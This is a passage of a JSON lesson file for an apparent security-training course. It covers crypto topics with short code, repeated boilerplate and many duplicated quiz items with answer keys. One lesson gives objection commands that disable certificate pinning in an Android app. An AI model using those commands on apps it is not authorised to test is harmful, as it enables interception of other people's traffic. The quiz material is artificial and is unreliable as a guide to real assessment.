length","Speed"],"ans":1},{"type":"quiz","q":"bcrypt is good because...","opts":["Fast","Deliberately slow","Reversible","Short keys"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway","Protected Purpose"],"ans":0},{"type":"quiz","q":"SHA-256 output is...","opts":["128 bits","256 bits","512 bits","64 bits"],"ans":1}]},{"id":"xor-cipher","cat":"Cryptography","title":"XOR Cipher Analysis","diff":1,"xp":75,"intro":"XOR encryption weaknesses.","sections":[{"type":"text","content":"XOR encryption weaknesses."},{"type":"code","lang":"python","content":"def xor(data,key):\n    return bytes([b^key[i%len(key)] for i,b in enumerate(data)])"},{"type":"text","content":"Most crypto failures aren't broken algorithms. They're implementation mistakes: reused keys, weak randomness, wrong modes. Understanding pitfalls matters more than math."},{"type":"tip","content":"Never roll your own crypto. Use tested libraries. The difference between secure and broken is often one parameter: ECB vs GCM, MD5 vs Argon2."},{"type":"task","content":"Encrypt a file with AES-GCM, then intentionally break it: try ECB, reuse a nonce, tamper with ciphertext. Understanding failures teaches more than success."},{"type":"quiz","q":"Single-byte XOR broken via?","opts":["Slow","Frequency analysis","Memory","Reversible"],"ans":1},{"type":"quiz","q":"Symmetric encryption uses...","opts":["Two different keys","One shared key","No key","A hash"],"ans":1},{"type":"quiz","q":"RSA is an example of...","opts":["Symmetric encryption","Asymmetric encryption","Hashing","Encoding"],"ans":1},{"type":"quiz","q":"Base64 is...","opts":["Encryption","Encoding (not encryption, easily reversed)","Hashing","Compression"],"ans":1},{"type":"quiz","q":"AES is which type of cipher?","opts":["Asymmetric","Symmetric block cipher","Hash function","Stream cipher"],"ans":1},{"type":"quiz","q":"The key size of AES-256 is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB mode weakness is...","opts":["Slow speed","Identical blocks produce identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"CBC mode requires...","opts":["No IV","An initialization vector (IV)","Two keys","A hash function"],"ans":1},{"type":"quiz","q":"MD5 is considered...","opts":["Secure for passwords","Broken (collision attacks exist)","The strongest hash","Symmetric encryption"],"ans":1},{"type":"quiz","q":"What is a nonce?","opts":["A password","A number used once (prevents replay)","A type of cipher","A key exchange protocol"],"ans":1},{"type":"quiz","q":"AES is which type of cipher?","opts":["Asymmetric","Symmetric block cipher","Hash function","Stream cipher"],"ans":1},{"type":"quiz","q":"The key size of AES-256 is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB mode weakness is...","opts":["Slow speed","Identical blocks produce identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"CBC mode requires...","opts":["No IV","An initialization vector (IV)","Two keys","A hash function"],"ans":1},{"type":"quiz","q":"MD5 is considered...","opts":["Secure for passwords","Broken (collision attacks exist)","The strongest hash","Symmetric encryption"],"ans":1},{"type":"quiz","q":"AES is...","opts":["Asymmetric","Symmetric block cipher","Hash","Stream cipher"],"ans":1},{"type":"quiz","q":"AES-256 key is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB weakness is...","opts":["Speed","Identical blocks = identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"MD5 is...","opts":["Secure","Broken (collisions exist)","Strongest","Symmetric"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","Hash + secret key","Two passwords","Symmetric + asymmetric"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is for...","opts":["Encryption","Key exchange","Hashing","Signatures"],"ans":1},{"type":"quiz","q":"Digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Speed"],"ans":1},{"type":"quiz","q":"bcrypt is good because...","opts":["Fast","Deliberately slow","Reversible","Short keys"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway","Protected Purpose"],"ans":0},{"type":"quiz","q":"SHA-256 output is...","opts":["128 bits","256 bits","512 bits","64 bits"],"ans":1}]},{"id":"bcrypt-scrypt","cat":"Cryptography","title":"bcrypt/scrypt/Argon2","diff":2,"xp":125,"intro":"Modern password hashing.","sections":[{"type":"text","content":"Modern password hashing."},{"type":"code","lang":"python","content":"import bcrypt\nhashed=bcrypt.hashpw(b'password',bcrypt.gensalt(12))"},{"type":"text","content":"Most crypto failures aren't broken algorithms. They're implementation mistakes: reused keys, weak randomness, wrong modes. Understanding pitfalls matters more than math."},{"type":"tip","content":"Never roll your own crypto. Use tested libraries. The difference between secure and broken is often one parameter: ECB vs GCM, MD5 vs Argon2."},{"type":"task","content":"Encrypt a file with AES-GCM, then intentionally break it: try ECB, reuse a nonce, tamper with ciphertext. Understanding failures teaches more than success."},{"type":"quiz","q":"Why better than SHA-256?","opts":["Longer output","Deliberately slow, expensive to brute force","More secure","Shorter"],"ans":1},{"type":"quiz","q":"A hash function is...","opts":["Reversible","One-way (irreversible)","Bidirectional","Symmetric"],"ans":1},{"type":"quiz","q":"Salt in password hashing prevents...","opts":["Brute force","Rainbow table attacks","All attacks","Dictionary attacks"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","A hash function with a secret key","Two passwords","Symmetric and asymmetric encryption"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is used for...","opts":["Encryption","Key exchange over insecure channel","Hashing","Digital signatures"],"ans":1},{"type":"quiz","q":"A digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Algorithm speed"],"ans":1},{"type":"quiz","q":"What makes bcrypt good for passwords?","opts":["It's fast","It's deliberately slow (adjustable cost)","It's reversible","It uses short keys"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway Portal","Protected General Purpose"],"ans":0},{"type":"quiz","q":"A certificate authority (CA) does what?","opts":["Hosts websites","Signs digital certificates to verify identity","Encrypts email","Blocks malware"],"ans":1},{"type":"quiz","q":"SHA-256 produces a hash of...","opts":["128 bits","256 bits","512 bits","64 bits"],"ans":1},{"type":"quiz","q":"What is a nonce?","opts":["A password","A number used once (prevents replay)","A type of cipher","A key exchange protocol"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","A hash function with a secret key","Two passwords","Symmetric and asymmetric encryption"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is used for...","opts":["Encryption","Key exchange over insecure channel","Hashing","Digital signatures"],"ans":1},{"type":"quiz","q":"A digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Algorithm speed"],"ans":1},{"type":"quiz","q":"What makes bcrypt good for passwords?","opts":["It's fast","It's deliberately slow (adjustable cost)","It's reversible","It uses short keys"],"ans":1},{"type":"quiz","q":"AES is...","opts":["Asymmetric","Symmetric block cipher","Hash","Stream cipher"],"ans":1},{"type":"quiz","q":"AES-256 key is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB weakness is...","opts":["Speed","Identical blocks = identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"MD5 is...","opts":["Secure","Broken (collisions exist)","Strongest","Symmetric"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","Hash + secret key","Two passwords","Symmetric + asymmetric"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is for...","opts":["Encryption","Key exchange","Hashing","Signatures"],"ans":1},{"type":"quiz","q":"Digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Speed"],"ans":1},{"type":"quiz","q":"bcrypt is good because...","opts":["Fast","Deliberately slow","Reversible","Short keys"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway","Protected Purpose"],"ans":0},{"type":"quiz","q":"SHA-256 output is...","opts":["128 bits","256 bits","512 bits","64 bits"],"ans":1}]},{"id":"hmac","cat":"Cryptography","title":"HMAC Authentication","diff":1,"xp":75,"intro":"Keyed message integrity.","sections":[{"type":"text","content":"Keyed message integrity."},{"type":"code","lang":"python","content":"import hmac,hashlib\nmac=hmac.new(key,message,hashlib.sha256).hexdigest()"},{"type":"text","content":"Most crypto failures aren't broken algorithms. They're implementation mistakes: reused keys, weak randomness, wrong modes. Understanding pitfalls matters more than math."},{"type":"tip","content":"Never roll your own crypto. Use tested libraries. The difference between secure and broken is often one parameter: ECB vs GCM, MD5 vs Argon2."},{"type":"task","content":"Encrypt a file with AES-GCM, then intentionally break it: try ECB, reuse a nonce, tamper with ciphertext. Understanding failures teaches more than success."},{"type":"quiz","q":"HMAC proves?","opts":["Confidentiality","Integrity and authenticity","Non-repudiation","Availability"],"ans":1},{"type":"quiz","q":"TLS replaced which older protocol?","opts":["SSH","SSL","IPSec","WPA"],"ans":1},{"type":"quiz","q":"Symmetric encryption uses...","opts":["Two different keys","One shared key","No key","A hash"],"ans":1},{"type":"quiz","q":"AES is which type of cipher?","opts":["Asymmetric","Symmetric block cipher","Hash function","Stream cipher"],"ans":1},{"type":"quiz","q":"The key size of AES-256 is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB mode weakness is...","opts":["Slow speed","Identical blocks produce identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"CBC mode requires...","opts":["No IV","An initialization vector (IV)","Two keys","A hash function"],"ans":1},{"type":"quiz","q":"MD5 is considered...","opts":["Secure for passwords","Broken (collision attacks exist)","The strongest hash","Symmetric encryption"],"ans":1},{"type":"quiz","q":"What is a nonce?","opts":["A password","A number used once (prevents replay)","A type of cipher","A key exchange protocol"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","A hash function with a secret key","Two passwords","Symmetric and asymmetric encryption"],"ans":1},{"type":"quiz","q":"AES is which type of cipher?","opts":["Asymmetric","Symmetric block cipher","Hash function","Stream cipher"],"ans":1},{"type":"quiz","q":"The key size of AES-256 is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB mode weakness is...","opts":["Slow speed","Identical blocks produce identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"CBC mode requires...","opts":["No IV","An initialization vector (IV)","Two keys","A hash function"],"ans":1},{"type":"quiz","q":"MD5 is considered...","opts":["Secure for passwords","Broken (collision attacks exist)","The strongest hash","Symmetric encryption"],"ans":1},{"type":"quiz","q":"AES is...","opts":["Asymmetric","Symmetric block cipher","Hash","Stream cipher"],"ans":1},{"type":"quiz","q":"AES-256 key is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB weakness is...","opts":["Speed","Identical blocks = identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"MD5 is...","opts":["Secure","Broken (collisions exist)","Strongest","Symmetric"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","Hash + secret key","Two passwords","Symmetric + asymmetric"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is for...","opts":["Encryption","Key exchange","Hashing","Signatures"],"ans":1},{"type":"quiz","q":"Digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Speed"],"ans":1},{"type":"quiz","q":"bcrypt is good because...","opts":["Fast","Deliberately slow","Reversible","Short keys"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway","Protected Purpose"],"ans":0},{"type":"quiz","q":"SHA-256 output is...","opts":["128 bits","256 bits","512 bits","64 bits"],"ans":1}]},{"id":"dh-exchange","cat":"Cryptography","title":"Diffie-Hellman","diff":2,"xp":150,"intro":"Shared secret over insecure channel.","sections":[{"type":"text","content":"Shared secret over insecure channel."},{"type":"code","lang":"python","content":"# Alice: A=g^a mod p\n# Bob: B=g^b mod p\n# Shared: B^a = A^b mod p"},{"type":"text","content":"Most crypto failures aren't broken algorithms. They're implementation mistakes: reused keys, weak randomness, wrong modes. Understanding pitfalls matters more than math."},{"type":"tip","content":"Never roll your own crypto. Use tested libraries. The difference between secure and broken is often one parameter: ECB vs GCM, MD5 vs Argon2."},{"type":"task","content":"Encrypt a file with AES-GCM, then intentionally break it: try ECB, reuse a nonce, tamper with ciphertext. Understanding failures teaches more than success."},{"type":"quiz","q":"DH solves?","opts":["Encryption","Shared secret over insecure channel","Signatures","Hashing"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is used for...","opts":["Encryption","Key exchange over insecure channel","Hashing","Digital signatures"],"ans":1},{"type":"quiz","q":"A digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Algorithm speed"],"ans":1},{"type":"quiz","q":"What makes bcrypt good for passwords?","opts":["It's fast","It's deliberately slow (adjustable cost)","It's reversible","It uses short keys"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway Portal","Protected General Purpose"],"ans":0},{"type":"quiz","q":"A certificate authority (CA) does what?","opts":["Hosts websites","Signs digital certificates to verify identity","Encrypts email","Blocks malware"],"ans":1},{"type":"quiz","q":"SHA-256 produces a hash of...","opts":["128 bits","256 bits","512 bits","64 bits"],"ans":1},{"type":"quiz","q":"A timing attack exploits...","opts":["Weak keys","Differences in execution time that leak information","Network latency","CPU bugs"],"ans":1},{"type":"quiz","q":"Base64 is...","opts":["Encryption","Encoding (not encryption, easily reversed)","Hashing","Compression"],"ans":1},{"type":"quiz","q":"AES is which type of cipher?","opts":["Asymmetric","Symmetric block cipher","Hash function","Stream cipher"],"ans":1},{"type":"quiz","q":"What is a nonce?","opts":["A password","A number used once (prevents replay)","A type of cipher","A key exchange protocol"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","A hash function with a secret key","Two passwords","Symmetric and asymmetric encryption"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is used for...","opts":["Encryption","Key exchange over insecure channel","Hashing","Digital signatures"],"ans":1},{"type":"quiz","q":"A digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Algorithm speed"],"ans":1},{"type":"quiz","q":"What makes bcrypt good for passwords?","opts":["It's fast","It's deliberately slow (adjustable cost)","It's reversible","It uses short keys"],"ans":1},{"type":"quiz","q":"AES is...","opts":["Asymmetric","Symmetric block cipher","Hash","Stream cipher"],"ans":1},{"type":"quiz","q":"AES-256 key is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB weakness is...","opts":["Speed","Identical blocks = identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"MD5 is...","opts":["Secure","Broken (collisions exist)","Strongest","Symmetric"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","Hash + secret key","Two passwords","Symmetric + asymmetric"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is for...","opts":["Encryption","Key exchange","Hashing","Signatures"],"ans":1},{"type":"quiz","q":"Digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Speed"],"ans":1},{"type":"quiz","q":"bcrypt is good because...","opts":["Fast","Deliberately slow","Reversible","Short keys"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway","Protected Purpose"],"ans":0},{"type":"quiz","q":"SHA-256 output is...","opts":["128 bits","256 bits","512 bits","64 bits"],"ans":1}]},{"id":"digital-sig","cat":"Cryptography","title":"Digital Signatures","diff":1,"xp":100,"intro":"Authenticity and non-repudiation.","sections":[{"type":"text","content":"Authenticity and non-repudiation."},{"type":"code","lang":"bash","content":"openssl dgst -sha256 -sign private.pem -out sig.bin file.txt"},{"type":"text","content":"Most crypto failures aren't broken algorithms. They're implementation mistakes: reused keys, weak randomness, wrong modes. Understanding pitfalls matters more than math."},{"type":"tip","content":"Never roll your own crypto. Use tested libraries. The difference between secure and broken is often one parameter: ECB vs GCM, MD5 vs Argon2."},{"type":"task","content":"Encrypt a file with AES-GCM, then intentionally break it: try ECB, reuse a nonce, tamper with ciphertext. Understanding failures teaches more than success."},{"type":"quiz","q":"Signature proves?","opts":["Encryption","Signer identity + data integrity","Compression","Speed"],"ans":1},{"type":"quiz","q":"The key size of AES-256 is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB mode weakness is...","opts":["Slow speed","Identical blocks produce identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"CBC mode requires...","opts":["No IV","An initialization vector (IV)","Two keys","A hash function"],"ans":1},{"type":"quiz","q":"MD5 is considered...","opts":["Secure for passwords","Broken (collision attacks exist)","The strongest hash","Symmetric encryption"],"ans":1},{"type":"quiz","q":"What is a nonce?","opts":["A password","A number used once (prevents replay)","A type of cipher","A key exchange protocol"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","A hash function with a secret key","Two passwords","Symmetric and asymmetric encryption"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is used for...","opts":["Encryption","Key exchange over insecure channel","Hashing","Digital signatures"],"ans":1},{"type":"quiz","q":"A digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Algorithm speed"],"ans":1},{"type":"quiz","q":"What makes bcrypt good for passwords?","opts":["It's fast","It's deliberately slow (adjustable cost)","It's reversible","It uses short keys"],"ans":1},{"type":"quiz","q":"AES is which type of cipher?","opts":["Asymmetric","Symmetric block cipher","Hash function","Stream cipher"],"ans":1},{"type":"quiz","q":"The key size of AES-256 is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB mode weakness is...","opts":["Slow speed","Identical blocks produce identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"CBC mode requires...","opts":["No IV","An initialization vector (IV)","Two keys","A hash function"],"ans":1},{"type":"quiz","q":"MD5 is considered...","opts":["Secure for passwords","Broken (collision attacks exist)","The strongest hash","Symmetric encryption"],"ans":1},{"type":"quiz","q":"AES is...","opts":["Asymmetric","Symmetric block cipher","Hash","Stream cipher"],"ans":1},{"type":"quiz","q":"AES-256 key is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB weakness is...","opts":["Speed","Identical blocks = identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"MD5 is...","opts":["Secure","Broken (collisions exist)","Strongest","Symmetric"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","Hash + secret key","Two passwords","Symmetric + asymmetric"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is for...","opts":["Encryption","Key exchange","Hashing","Signatures"],"ans":1},{"type":"quiz","q":"Digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Speed"],"ans":1},{"type":"quiz","q":"bcrypt is good because...","opts":["Fast","Deliberately slow","Reversible","Short keys"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway","Protected Purpose"],"ans":0},{"type":"quiz","q":"SHA-256 output is...","opts":["128 bits","256 bits","512 bits","64 bits"],"ans":1}]},{"id":"cert-pin","cat":"Cryptography","title":"Cert Pinning Bypass","diff":3,"xp":200,"intro":"Bypass mobile cert pinning.","sections":[{"type":"text","content":"Bypass mobile cert pinning."},{"type":"code","lang":"bash","content":"objection -g com.app explore\nandroid sslpinning disable"},{"type":"text","content":"Most crypto failures aren't broken algorithms. They're implementation mistakes: reused keys, weak randomness, wrong modes. Understanding pitfalls matters more than math."},{"type":"tip","content":"Never roll your own crypto. Use tested libraries. The difference between secure and broken is often one parameter: ECB vs GCM, MD5 vs Argon2."},{"type":"task","content":"Encrypt a file with AES-GCM, then intentionally break it: try ECB, reuse a nonce, tamper with ciphertext. Understanding failures teaches more than success."},{"type":"quiz","q":"Cert pinning protects against?","opts":["SQLi","MITM with rogue certs","XSS","Buffer overflow"],"ans":1},{"type":"quiz","q":"AES is which type of cipher?","opts":["Asymmetric","Symmetric block cipher","Hash function","Stream cipher"],"ans":1},{"type":"quiz","q":"The key size of AES-256 is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB mode weakness is...","opts":["Slow speed","Identical blocks produce identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"CBC mode requires...","opts":["No IV","An initialization vector (IV)","Two keys","A hash function"],"ans":1},{"type":"quiz","q":"MD5 is considered...","opts":["Secure for passwords","Broken (collision attacks exist)","The strongest hash","Symmetric encryption"],"ans":1},{"type":"quiz","q":"What is a nonce?","opts":["A password","A number used once (prevents replay)","A type of cipher","A key exchange protocol"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","A hash function with a secret key","Two passwords","Symmetric and asymmetric encryption"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is used for...","opts":["Encryption","Key exchange over insecure channel","Hashing","Digital signatures"],"ans":1},{"type":"quiz","q":"A digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Algorithm speed"],"ans":1},{"type":"quiz","q":"What is a nonce?","opts":["A password","A number used once (prevents replay)","A type of cipher","A key exchange protocol"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","A hash function with a secret key","Two passwords","Symmetric and asymmetric encryption"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is used for...","opts":["Encryption","Key exchange over insecure channel","Hashing","Digital signatures"],"ans":1},{"type":"quiz","q":"A digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Algorithm speed"],"ans":1},{"type":"quiz","q":"What makes bcrypt good for passwords?","opts":["It's fast","It's deliberately slow (adjustable cost)","It's reversible","It uses short keys"],"ans":1},{"type":"quiz","q":"AES is...","opts":["Asymmetric","Symmetric block cipher","Hash","Stream cipher"],"ans":1},{"type":"quiz","q":"AES-256 key is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB weakness is...","opts":["Speed","Identical blocks = identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"MD5 is...","opts":["Secure","Broken (collisions exist)","Strongest","Symmetric"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","Hash + secret key","Two passwords","Symmetric + asymmetric"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is for...","opts":["Encryption","Key exchange","Hashing","Signatures"],"ans":1},{"type":"quiz","q":"Digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Speed"],"ans":1},{"type":"quiz","q":"bcrypt is good because...","opts":["Fast","Deliberately slow","Reversible","Short keys"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway","Protected Purpose"],"ans":0},{"type":"quiz","q":"SHA-256 output is...","opts":["128 bits","256 bits","512 bits","64 bits"],"ans":1}]},{"id":"cipher-modes","cat":"Cryptography","title":"Block Cipher Modes","diff":2,"xp":125,"intro":"ECB, CBC, CTR, GCM.","sections":[{"type":"text","content":"ECB, CBC, CTR, GCM."},{"type":"code","lang":"python","content":"# ECB: same block \u2192 same output (INSECURE)\n# GCM: CTR + auth (RECOMMENDED)"},{"type":"text","content":"Most crypto failures aren't broken algorithms. They're implementation mistakes: reused keys, weak randomness, wrong modes. Understanding pitfalls matters more than math."},{"type":"tip","content":"Never roll your own crypto. Use tested libraries. The difference between secure and broken is often one parameter: ECB vs GCM, MD5 vs Argon2."},{"type":"task","content":"Encrypt a file with AES-GCM, then intentionally break it: try ECB, reuse a nonce, tamper with ciphertext. Understanding failures teaches more than success."},{"type":"quiz","q":"Most insecure mode?","opts":["GCM","ECB","CBC","CTR"],"ans":1},{"type":"quiz","q":"What makes bcrypt good for passwords?","opts":["It's fast","It's deliberately slow (adjustable cost)","It's reversible","It uses short keys"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway Portal","Protected General Purpose"],"ans":0},{"type":"quiz","q":"A certificate authority (CA) does what?","opts":["Hosts websites","Signs digital certificates to verify identity","Encrypts email","Blocks malware"],"ans":1},{"type":"quiz","q":"SHA-256 produces a hash of...","opts":["128 bits","256 bits","512 bits","64 bits"],"ans":1},{"type":"quiz","q":"A timing attack exploits...","opts":["Weak keys","Differences in execution time that leak information","Network latency","CPU bugs"],"ans":1},{"type":"quiz","q":"Base64 is...","opts":["Encryption","Encoding (not encryption, easily reversed)","Hashing","Compression"],"ans":1},{"type":"quiz","q":"AES is which type of cipher?","opts":["Asymmetric","Symmetric block cipher","Hash function","Stream cipher"],"ans":1},{"type":"quiz","q":"The key size of AES-256 is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB mode weakness is...","opts":["Slow speed","Identical blocks produce identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"AES is which type of cipher?","opts":["Asymmetric","Symmetric block cipher","Hash function","Stream cipher"],"ans":1},{"type":"quiz","q":"The key size of AES-256 is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB mode weakness is...","opts":["Slow speed","Identical blocks produce identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"CBC mode requires...","opts":["No IV","An initialization vector (IV)","Two keys","A hash function"],"ans":1},{"type":"quiz","q":"MD5 is considered...","opts":["Secure for passwords","Broken (collision attacks exist)","The strongest hash","Symmetric encryption"],"ans":1},{"type":"quiz","q":"AES is...","opts":["Asymmetric","Symmetric block cipher","Hash","Stream cipher"],"ans":1},{"type":"quiz","q":"AES-256 key is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB weakness is...","opts":["Speed","Identical blocks = identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"MD5 is...","opts":["Secure","Broken (collisions exist)","Strongest","Symmetric"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","Hash + secret key","Two passwords","Symmetric + asymmetric"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is for...","opts":["Encryption","Key exchange","Hashing","Signatures"],"ans":1},{"type":"quiz","q":"Digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Speed"],"ans":1},{"type":"quiz","q":"bcrypt is good because...","opts":["Fast","Deliberately slow","Reversible","Short keys"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway","Protected Purpose"],"ans":0},{"type":"quiz","q":"SHA-256 output is...","opts":["128 bits","256 bits","512 bits","64 bits"],"ans":1}]},{"id":"pgp","cat":"Cryptography","title":"PGP/GPG Encryption","diff":1,"xp":75,"intro":"File and email encryption.","sections":[{"type":"text","content":"File and email encryption."},{"type":"code","lang":"bash","content":"gpg --full-generate-key\ngpg --encrypt --recipient user@example.com file.txt"},{"type":"text","content":"Most crypto failures aren't broken algorithms. They're implementation mistakes: reused keys, weak randomness, wrong modes. Understanding pitfalls matters more than math."},{"type":"tip","content":"Never roll your own crypto. Use tested libraries. The difference between secure and broken is often one parameter: ECB vs GCM, MD5 vs Argon2."},{"type":"task","content":"Encrypt a file with AES-GCM, then intentionally break it: try ECB, reuse a nonce, tamper with ciphertext. Understanding failures teaches more than success."},{"type":"quiz","q":"PGP used for?","opts":["Web security","Email and file encryption","Scanning","Cracking"],"ans":1},{"type":"quiz","q":"AES is which type of cipher?","opts":["Asymmetric","Symmetric block cipher","Hash function","Stream cipher"],"ans":1},{"type":"quiz","q":"The key size of AES-256 is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB mode weakness is...","opts":["Slow speed","Identical blocks produce identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"CBC mode requires...","opts":["No IV","An initialization vector (IV)","Two keys","A hash function"],"ans":1},{"type":"quiz","q":"MD5 is considered...","opts":["Secure for passwords","Broken (collision attacks exist)","The strongest hash","Symmetric encryption"],"ans":1},{"type":"quiz","q":"What is a nonce?","opts":["A password","A number used once (prevents replay)","A type of cipher","A key exchange protocol"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","A hash function with a secret key","Two passwords","Symmetric and asymmetric encryption"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is used for...","opts":["Encryption","Key exchange over insecure channel","Hashing","Digital signatures"],"ans":1},{"type":"quiz","q":"A digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Algorithm speed"],"ans":1},{"type":"quiz","q":"What is a nonce?","opts":["A password","A number used once (prevents replay)","A type of cipher","A key exchange protocol"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","A hash function with a secret key","Two passwords","Symmetric and asymmetric encryption"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is used for...","opts":["Encryption","Key exchange over insecure channel","Hashing","Digital signatures"],"ans":1},{"type":"quiz","q":"A digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Algorithm speed"],"ans":1},{"type":"quiz","q":"What makes bcrypt good for passwords?","opts":["It's fast","It's deliberately slow (adjustable cost)","It's reversible","It uses short keys"],"ans":1},{"type":"quiz","q":"AES is...","opts":["Asymmetric","Symmetric block cipher","Hash","Stream cipher"],"ans":1},{"type":"quiz","q":"AES-256 key is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB weakness is...","opts":["Speed","Identical blocks = identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"MD5 is...","opts":["Secure","Broken (collisions exist)","Strongest","Symmetric"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","Hash + secret key","Two passwords","Symmetric + asymmetric"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is for...","opts":["Encryption","Key 